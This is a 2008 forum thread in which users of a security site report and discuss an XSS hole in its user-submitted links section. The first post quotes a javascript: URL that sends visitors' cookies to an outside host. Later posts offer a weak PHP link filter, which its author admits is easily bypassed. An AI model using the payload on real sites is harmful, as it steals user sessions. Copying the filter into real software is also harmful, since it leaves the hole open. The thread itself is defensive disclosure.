Links section
Global Rank: 172
Totalscore: 115603
Posts: 166
Thanks: 162
UpVotes: 119
Registered: 16y 65d
Last Seen: 240d 19h
The User is Offline
Links section
Apr 23, 2008 - 16:25:58 (16y 8d)
Apr 23, 2008 - 16:25:58 (16y 8d)
javascript:document.location="http://osmosis.ath.cx/~mals/mals/o.php?o="+document.cookie
Hmm, does not look good...
Hmm, does not look good...
Global Rank: 253
Totalscore: 87266
Posts: 1639
Thanks: 1338
UpVotes: 886
Registered: 16y 73d
Last Seen: 8h 59m
The User is Offline
Links section
Apr 23, 2008 - 16:48:03 (16y 8d)
Apr 23, 2008 - 16:48:03 (16y 8d)
Thanks for alerting us.
I deleted the harmful links.
Currently i have no idea how to sanitize submitted links properly.
Maybe we should add some <noscript> tags for links section ?
@mals: Thanks for finding a real security problem
I deleted the harmful links.
Currently i have no idea how to sanitize submitted links properly.
Maybe we should add some <noscript> tags for links section ?
@mals: Thanks for finding a real security problem
The geeks shall inherit the properties and methods of object earth.
Global Rank: 437
Totalscore: 55759
Posts: 34
Thanks: 39
UpVotes: 18
Registered: 16y 69d
Last Seen: 14y 56d
The User is Offline
Links section
Apr 23, 2008 - 17:09:46 (16y 8d)
Apr 23, 2008 - 17:09:46 (16y 8d)
Links should be validated by admins first.
Global Rank: 73
Totalscore: 213030
Posts: 148
Thanks: 206
UpVotes: 107
Registered: 16y 72d
Last Seen: 2y 43d
The User is Offline
Links section
Apr 23, 2008 - 19:48:57 (16y 8d)
Apr 23, 2008 - 19:48:57 (16y 8d)
I agree with theAnswer.
What's to stop people from adding tons of ad-links?
What's to stop people from adding tons of ad-links?
Global Rank: 253
Totalscore: 87266
Posts: 1639
Thanks: 1338
UpVotes: 886
Registered: 16y 73d
Last Seen: 8h 59m
The User is Offline
Links section
Apr 23, 2008 - 20:16:23 (16y 8d)
Apr 23, 2008 - 20:16:23 (16y 8d)
The amount of links you can add depends on your totalscore.
how about this snippet to prevent xss in links ?
My guess is that this would only make it slightly harder to exploit.
how about this snippet to prevent xss in links ?
GeSHi`ed Plaintext code
1
2
3
4
56
|
$url = str_replace("http://", "", $url);
if (strpos($url, "://") !== false) {
return htmlDisplayError("only valid links please.");
}
|
My guess is that this would only make it slightly harder to exploit.
The geeks shall inherit the properties and methods of object earth.
Global Rank: 29366
Totalscore: 0
Posts: 257
Thanks: 236
UpVotes: 173
Registered: 24y 156d
Last Seen: 1s
The User is Online
Links section
Apr 24, 2008 - 13:10:23 (16y 7d)
Apr 24, 2008 - 13:10:23 (16y 7d)
stop trying to be funny.
Global Rank: 172
Totalscore: 115603
Posts: 166
Thanks: 162
UpVotes: 119
Registered: 16y 65d
Last Seen: 240d 19h
The User is Offline
Links section
Apr 24, 2008 - 13:46:21 (16y 7d)
Apr 24, 2008 - 13:46:21 (16y 7d)
There are tons of solutions on the net, but this one looks short and good enough:
http://svn.bitflux.ch/repos/public/popoon/trunk/classes/externalinput.php
http://svn.bitflux.ch/repos/public/popoon/trunk/classes/externalinput.php
Global Rank: 54
Totalscore: 257209
Posts: 152
Thanks: 127
UpVotes: 157
Registered: 16y 71d
Last Seen: 26d 18h
The User is Offline
Links section
Apr 24, 2008 - 15:50:04 (16y 7d)
Apr 24, 2008 - 15:50:04 (16y 7d)
Maybe checkout the W3C specification for URL. I bet u'll find a regex for it.
Global Rank: 172
Totalscore: 115603
Posts: 166
Thanks: 162
UpVotes: 119
Registered: 16y 65d
Last Seen: 240d 19h
The User is Offline
Links section
Apr 24, 2008 - 16:10:19 (16y 7d)
Apr 24, 2008 - 16:10:19 (16y 7d)
I think regex is not a good way, because nothing ensures that a valid url doesnt contain an evil payload. This statement is only theoretical, but true.
Lessons learned: preventing xss is a hard nut...
Lessons learned: preventing xss is a hard nut...
tunelko, quangntenemy, TheHiveMind, Z, balicocat, Ge0, samuraiblanco, arraez, jcquinterov, hophuocthinh, alfamen2, burhanudinn123, Ben_Dover, stephanduran89, braddie0, JanLitwin17, SwolloW, dangarbri have subscribed to this thread and receive emails on new posts.
1 people are watching the thread at the moment.
This thread has been viewed 2800 times.
1 people are watching the thread at the moment.
This thread has been viewed 2800 times.